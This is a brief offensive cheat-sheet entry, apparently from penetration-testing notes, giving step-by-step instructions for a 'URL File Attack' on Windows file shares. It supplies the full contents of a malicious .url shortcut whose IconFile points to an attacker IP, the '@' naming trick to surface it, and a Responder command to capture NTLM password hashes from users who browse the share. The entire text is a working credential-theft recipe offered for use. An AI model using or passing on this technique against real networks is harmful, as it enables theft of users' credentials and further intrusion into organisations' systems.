URL File Attack

• Requires a compromised user account or an open file share

Steps

• Create a file containing the following

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\IP-ADDRESS\%USERNAME%.icon
IconIndex=1

• IP-ADDRESS should be your attacker IP

• Save this file to a network file share with the name "@something.url"

• On your attacker machine start responder - sudo responder -I eth0

• On the victim machine close all explorer windows and open a new one, then navigate to the file share where you saved the file

• On the attacker machine you should see hashes pop up